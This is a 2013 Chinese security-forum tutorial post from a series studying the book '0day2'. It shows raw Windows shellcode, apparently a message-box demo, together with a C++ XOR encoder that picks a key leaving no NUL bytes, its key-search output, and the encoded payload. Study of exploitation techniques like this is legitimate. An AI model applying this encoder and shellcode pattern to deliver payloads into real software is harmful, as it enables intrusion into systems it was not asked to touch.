[原创]旧书重温:0day2[5]shellcode变形记
发表于: 2013-12-14 08:43 4537


旧书重温:0day2【1】 简单的缓冲区溢出案例 http://bbs.pediy.com/showthread.php?t=182497
旧书重温:0day2【2】 实验:三种获取kernel32.dll基址的方法 http://bbs.pediy.com/showthread.php?t=182498
旧书重温:0day2【3】 详细解读PEB法 查找kener32地址 http://bbs.pediy.com/showthread.php?t=182499
旧书重温:0day2【4】动态获取函数地址 http://bbs.pediy.com/showthread.php?t=182520
旧书重温:0day2【5】shellcode变形记 http://bbs.pediy.com/showthread.php?t=182551
旧书重温:0day2【6】bind_shell http://bbs.pediy.com/showthread.php?t=182689
\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8
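int ishellcodelen = sizeof(shellcode);
    /*
     * XOR-encode 'shellcode' with a single-byte key and write the result to
     * password2.txt.  The encoding exists so that the byte stream copied into
     * the target contains no 0x00: a NUL stops a strcpy()-style copy before
     * the rest of the payload arrives, and the decoder stub restores the
     * original bytes at run time.
     *
     * NOTE(review): in the recorded run strlen() of the encoded buffer is 182
     * for most keys but 181 for key 0, so sizeof(shellcode) evidently counts
     * the string literal's trailing NUL.  Only the 181 payload bytes are
     * encoded and written; the terminator is not part of the shellcode.
     */
    const int payloadlen = ishellcodelen - 1;
    const unsigned char xorkey = 0xCE;   /* picked from the key-search output */
    int i = 0;
    int j = 0;

    xorshellcode = new char[ishellcodelen + 2];
    memset(xorshellcode, 0x00, ishellcodelen + 2);
    /* 'cpy' is declared outside this listing.  The corrected key search no
     * longer needs it, but it is still allocated in case later code uses it. */
    cpy = new char[ishellcodelen + 2];
    memset(cpy, 0x00, ishellcodelen + 2);

    /*
     * Key search: a key is usable when no payload byte XORs to 0x00.  The
     * earlier version compared strlen(cpy) with strlen(xorshellcode) after a
     * strcpy(), which holds for every key, and its loop stopped at 0xFE; count
     * the non-zero bytes directly and try all 256 keys.  If the target reads
     * its input line by line, 0x0A and 0x0D are bad bytes too and should be
     * rejected here as well -- that depends on the delivery path, not on this
     * encoder.
     */
    int keyusable = 0;
    for (j = 0; j <= 0xff; j++)
    {
        int nonzero = 0;
        for (i = 0; i < payloadlen; i++)
        {
            if ((unsigned char)(shellcode[i] ^ j) != 0)
                nonzero++;
        }
        if (nonzero == payloadlen)
        {
            printf("key %02x leaves no NUL byte\n", j);
            if (j == xorkey)
                keyusable = 1;
        }
    }
    if (!keyusable)
    {
        printf("key %02x yields a NUL byte, choose another key\n", xorkey);
        exit(1);
    }

    for (i = 0; i < payloadlen; i++)
    {
        xorshellcode[i] = shellcode[i] ^ xorkey;
    }

    /*
     * "wb", not "w+": in text mode the CRT rewrites every 0x0A as 0x0D 0x0A.
     * This payload contains 0xC4 twice and 0xC4 ^ 0xCE == 0x0A, which is why
     * the encoded dump below shows "\x0D\x0A" at those two positions -- the
     * file on disk no longer decodes to the original shellcode.
     */
    FILE * fp = fopen("password2.txt", "wb");
    if (!fp)
    {
        perror("fopen password2.txt");
        exit(1);
    }
    /* size 1, count payloadlen: the return value is then a byte count.  The
     * earlier call passed strlen() as the element size and 1 as the count, so
     * it always reported 1 and would also have stopped at any NUL in the
     * encoded buffer. */
    int l = (int)fwrite(xorshellcode, 1, payloadlen, fp);
    printf("fp write byte %d \n", l);
    if (l != payloadlen || fclose(fp) != 0)
    {
        perror("write password2.txt");
        exit(1);
    }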
cpy is 181 , xor is 181 0
cpy is 182 , xor is 182 1
cpy is 182 , xor is 182 2
cpy is 89 , xor is 89 3
cpy is 24 , xor is 24 4
cpy is 75 , xor is 75 5
cpy is 107 , xor is 107 6
cpy is 114 , xor is 114 7
cpy is 54 , xor is 54 8
cpy is 59 , xor is 59 9
cpy is 3 , xor is 3 a
cpy is 182 , xor is 182 b
cpy is 15 , xor is 15 c
cpy is 182 , xor is 182 d
cpy is 182 , xor is 182 e
cpy is 105 , xor is 105 f
cpy is 182 , xor is 182 10
cpy is 182 , xor is 182 11
cpy is 182 , xor is 182 12
cpy is 182 , xor is 182 13
cpy is 182 , xor is 182 14
cpy is 182 , xor is 182 15
cpy is 182 , xor is 182 16
cpy is 182 , xor is 182 17
cpy is 63 , xor is 63 18
cpy is 182 , xor is 182 19
cpy is 182 , xor is 182 1a
cpy is 182 , xor is 182 1b
cpy is 49 , xor is 49 1c
cpy is 182 , xor is 182 1d
cpy is 5 , xor is 5 1e
cpy is 182 , xor is 182 1f
cpy is 57 , xor is 57 20
cpy is 182 , xor is 182 21
cpy is 182 , xor is 182 22
cpy is 182 , xor is 182 23
cpy is 122 , xor is 122 24
cpy is 182 , xor is 182 25
cpy is 182 , xor is 182 26
cpy is 182 , xor is 182 27
cpy is 182 , xor is 182 28
cpy is 182 , xor is 182 29
cpy is 182 , xor is 182 2a
cpy is 25 , xor is 25 2b
cpy is 141 , xor is 141 2c
cpy is 182 , xor is 182 2d
cpy is 182 , xor is 182 2e
cpy is 182 , xor is 182 2f
cpy is 43 , xor is 43 30
cpy is 182 , xor is 182 31
cpy is 12 , xor is 12 32
cpy is 21 , xor is 21 33
cpy is 100 , xor is 100 34
cpy is 182 , xor is 182 35
cpy is 182 , xor is 182 36
cpy is 182 , xor is 182 37
cpy is 4 , xor is 4 38
cpy is 61 , xor is 61 39
cpy is 108 , xor is 108 3a
cpy is 120 , xor is 120 3b
cpy is 84 , xor is 84 3c
cpy is 69 , xor is 69 3d
cpy is 182 , xor is 182 3e
cpy is 182 , xor is 182 3f
cpy is 182 , xor is 182 40
cpy is 182 , xor is 182 41
cpy is 182 , xor is 182 42
cpy is 182 , xor is 182 43
cpy is 182 , xor is 182 44
cpy is 83 , xor is 83 45
cpy is 117 , xor is 117 46
cpy is 98 , xor is 98 47
cpy is 182 , xor is 182 48
cpy is 48 , xor is 48 49
cpy is 182 , xor is 182 4a
cpy is 45 , xor is 45 4b
cpy is 86 , xor is 86 4c
cpy is 182 , xor is 182 4d
cpy is 182 , xor is 182 4e
cpy is 10 , xor is 10 4f
cpy is 171 , xor is 171 50
cpy is 182 , xor is 182 51
cpy is 182 , xor is 182 52
cpy is 31 , xor is 31 53
cpy is 37 , xor is 37 54
cpy is 182 , xor is 182 55
cpy is 51 , xor is 51 56
cpy is 50 , xor is 50 57
cpy is 182 , xor is 182 58
cpy is 92 , xor is 92 59
cpy is 42 , xor is 42 5a
cpy is 182 , xor is 182 5b
cpy is 182 , xor is 182 5c
cpy is 182 , xor is 182 5d
cpy is 66 , xor is 66 5e
cpy is 67 , xor is 67 5f
cpy is 81 , xor is 81 60
cpy is 147 , xor is 147 61
cpy is 164 , xor is 164 62
cpy is 7 , xor is 7 63
cpy is 40 , xor is 40 64
cpy is 35 , xor is 35 65
cpy is 27 , xor is 27 66
cpy is 182 , xor is 182 67
cpy is 1 , xor is 1 68
cpy is 53 , xor is 53 69
cpy is 2 , xor is 2 6a
cpy is 182 , xor is 182 6b
cpy is 182 , xor is 182 6c
cpy is 182 , xor is 182 6d
cpy is 182 , xor is 182 6e
cpy is 182 , xor is 182 6f
cpy is 182 , xor is 182 70
cpy is 182 , xor is 182 71
cpy is 36 , xor is 36 72
cpy is 34 , xor is 34 73
cpy is 13 , xor is 13 74
cpy is 33 , xor is 33 75
cpy is 182 , xor is 182 76
cpy is 182 , xor is 182 77
cpy is 88 , xor is 88 78
cpy is 56 , xor is 56 79
cpy is 182 , xor is 182 7a
cpy is 134 , xor is 134 7b
cpy is 182 , xor is 182 7c
cpy is 182 , xor is 182 7d
cpy is 19 , xor is 19 7e
cpy is 182 , xor is 182 7f
cpy is 182 , xor is 182 80
cpy is 182 , xor is 182 81
cpy is 182 , xor is 182 82
cpy is 182 , xor is 182 83
cpy is 182 , xor is 182 84
cpy is 182 , xor is 182 85
cpy is 182 , xor is 182 86
cpy is 182 , xor is 182 87
cpy is 182 , xor is 182 88
cpy is 8 , xor is 8 89
cpy is 182 , xor is 182 8a
cpy is 16 , xor is 16 8b
cpy is 182 , xor is 182 8c
cpy is 18 , xor is 18 8d
cpy is 182 , xor is 182 8e
cpy is 182 , xor is 182 8f
cpy is 182 , xor is 182 90
cpy is 14 , xor is 14 91
cpy is 182 , xor is 182 92
cpy is 182 , xor is 182 93
cpy is 182 , xor is 182 94
cpy is 76 , xor is 76 95
cpy is 182 , xor is 182 96
cpy is 182 , xor is 182 97
cpy is 182 , xor is 182 98
cpy is 104 , xor is 104 99
cpy is 182 , xor is 182 9a
cpy is 182 , xor is 182 9b
cpy is 182 , xor is 182 9c
cpy is 182 , xor is 182 9d
cpy is 182 , xor is 182 9e
cpy is 182 , xor is 182 9f
cpy is 182 , xor is 182 a0
cpy is 182 , xor is 182 a1
cpy is 182 , xor is 182 a2
cpy is 182 , xor is 182 a3
cpy is 182 , xor is 182 a4
cpy is 182 , xor is 182 a5
cpy is 182 , xor is 182 a6
cpy is 182 , xor is 182 a7
cpy is 182 , xor is 182 a8
cpy is 154 , xor is 154 a9
cpy is 182 , xor is 182 aa
cpy is 145 , xor is 145 ab
cpy is 182 , xor is 182 ac
cpy is 68 , xor is 68 ad
cpy is 182 , xor is 182 ae
cpy is 182 , xor is 182 af
cpy is 182 , xor is 182 b0
cpy is 182 , xor is 182 b1
cpy is 182 , xor is 182 b2
cpy is 182 , xor is 182 b3
cpy is 182 , xor is 182 b4
cpy is 182 , xor is 182 b5
cpy is 182 , xor is 182 b6
cpy is 23 , xor is 23 b7
cpy is 182 , xor is 182 b8
cpy is 182 , xor is 182 b9
cpy is 182 , xor is 182 ba
cpy is 28 , xor is 28 bb
cpy is 182 , xor is 182 bc
cpy is 182 , xor is 182 bd
cpy is 106 , xor is 106 be
cpy is 182 , xor is 182 bf
cpy is 182 , xor is 182 c0
cpy is 112 , xor is 112 c1
cpy is 182 , xor is 182 c2
cpy is 182 , xor is 182 c3
cpy is 109 , xor is 109 c4
cpy is 182 , xor is 182 c5
cpy is 182 , xor is 182 c6
cpy is 182 , xor is 182 c7
cpy is 182 , xor is 182 c8
cpy is 182 , xor is 182 c9
cpy is 113 , xor is 113 ca
cpy is 182 , xor is 182 cb
cpy is 182 , xor is 182 cc
cpy is 90 , xor is 90 cd
cpy is 182 , xor is 182 ce
cpy is 182 , xor is 182 cf
cpy is 116 , xor is 116 d0
cpy is 9 , xor is 9 d1
cpy is 39 , xor is 39 d2
cpy is 182 , xor is 182 d3
cpy is 182 , xor is 182 d4
cpy is 182 , xor is 182 d5
cpy is 182 , xor is 182 d6
cpy is 182 , xor is 182 d7
cpy is 182 , xor is 182 d8
cpy is 182 , xor is 182 d9
cpy is 182 , xor is 182 da
cpy is 22 , xor is 22 db
cpy is 182 , xor is 182 dc
cpy is 95 , xor is 95 dd
cpy is 182 , xor is 182 de
cpy is 182 , xor is 182 df
cpy is 182 , xor is 182 e0
cpy is 182 , xor is 182 e1
cpy is 182 , xor is 182 e2
cpy is 26 , xor is 26 e3
cpy is 125 , xor is 125 e4
cpy is 182 , xor is 182 e5
cpy is 182 , xor is 182 e6
cpy is 182 , xor is 182 e7
cpy is 182 , xor is 182 e8
cpy is 182 , xor is 182 e9
cpy is 182 , xor is 182 ea
cpy is 118 , xor is 118 eb
cpy is 182 , xor is 182 ec
cpy is 182 , xor is 182 ed
cpy is 182 , xor is 182 ee
cpy is 182 , xor is 182 ef
cpy is 182 , xor is 182 f0
cpy is 119 , xor is 119 f1
cpy is 65 , xor is 65 f2
cpy is 182 , xor is 182 f3
cpy is 17 , xor is 17 f4
cpy is 103 , xor is 103 f5
cpy is 182 , xor is 182 f6
cpy is 182 , xor is 182 f7
cpy is 79 , xor is 79 f8
cpy is 182 , xor is 182 f9
cpy is 182 , xor is 182 fa
cpy is 182 , xor is 182 fb
cpy is 0 , xor is 0 fc
cpy is 182 , xor is 182 fd
cpy is 182 , xor is 182 fe
fp write byte 1
Press any key to continue
0012FB23        32 A6 A4 C4 F6 D0 A6 AD 47 1F 81 A6 FC BA    2Δ啮笑璆仸
0012FB33  5F C2 45 3A 43 B0 C2 FD 15 79 CA E5 2D A8 75 FD  _翬:C奥?y叔-╱?
0012FB43  FC 9D A6 BB BD AB BC 9A FD 1C AA 45 94 FE 45 85  鼭将細?狤旫E?
0012FB53  C2 45 87 D2 99 98 45 A7 C6 45 B7 EE 45 C7 A8 F7  翬囈櫂EE奉E迁?
0012FB63  99 D6 BB 3C 90 91 63 F3 A4 C4 F6 D0 BB CB 5B 31  欀?悜c螭啮谢薣1
0012FB73  99 36 5B AE 45 8B F2 45 82 CB B6 CD 03 45 97 EE  ?[瓻嬺E偹锻E楊
0012FB83  CD 13 FD 31 89 45 FA 75 CD 3B 57 C1 70 C8 F4 00  ??塃鷘?W羛若.
0012FB93  A4 C4 F6 D0 A6 AD 47 1F 81 A6 FC BA 5F C2 45 3A  つ鲂ΝG仸_翬:
0012FBA3  43 B0 C2 FD 15 79 CA E5 2D A8 75 FD FC 9D A6 BB  C奥?y叔-╱潶?
0012FBB3  BD AB BC 9A FD 1C AA 45 94 FE 45 85 C2 45 87 D2  将細?狤旫E吢E囈
0012FBC3  99 98 45 A7 C6 45 B7 EE 45 C7 A8 F7 99 D6 BB 3C  櫂EE奉E迁鳈只<
0012FBD3  90 91 63 F3 A4 C4 F6 D0 BB CB 5B 31 99 36        悜c螭啮谢薣1?
\x32\xA6\xA4\xC4\xF6\xD0\xA6\xAD\x47\x1F\x81\xA6\xFC\xBA\x5F\xC2\x45\x3A\x43\xB0\xC2\xFD\x15\x79\xCA\xE5\x2D\xA8\x75\xFD\xFC\x9D\xA6\xBB\xBD\xAB\xBC\x9A\xFD\x1C\xAA\x45\x94\xFE\x45\x85\xC2\x45\x87\xD2\x99\x98\x45\xA7\xC6\x45\xB7\xEE\x45\xC7\xA8\xF7\x99\xD6\xBB\x3C\x90\x91\x63\xF3\xA4\xC4\xF6\xD0\xBB\xCB\x5B\x31\x99\x36\x5B\xAE\x45\x8B\xF2\x45\x82\xCB\xB6\xCD\x03\x45\x97\xEE\xCD\x13\xFD\x31\x89\x45\xFA\x75\xCD\x3B\x57\xC1\x70[COLOR="Red"]\xC8\xF4\x0D\x0A\xBA\xC6\x0F\x04\xC9\xCD\x1E\x88\x25\x3F\xF5\x9A\xEA\xD2\xBB\x2A\x45\x97\xEA\xCD\x13\xA8\x45\xF2\xB5\x45\x97\xD2\xCD\x13\xCD\xE2\x75\x5B\x91\x65\x99\xAF\xF3\xA4\xC4\xF6\xD0\xBB\x67\xFD\x15\x9D\xA6\xAF\xAF\xAF\xAF\xA6\xAC\xAC\xAC\xAC\x45\x0D\x0A\x9D\x9E\x9E\x9D\x31\x99\x32\x9D[/COLOR]\x31\x99\x36

最新回复 (3)
2
0day2确实好,可惜我买回来,没有看完,挑着看的,没有向楼主复现所有技术
2014-7-12 09:42
3
纸上得来终觉浅,绝知此事要躬行; 实践中 见真知! 每次看说 目测感觉,我什么都明白!但是 真正把实验 做一遍,你才会发现,很多都不明白!
2014-7-15 09:13
4
每天晚上 2个小时!  这个 实验 也就2小时吧,从温习文章 、 重点学习 到动手 调试 最多 2天 (2×2) = 4个小时 就 搞定了!
2014-7-15 09:14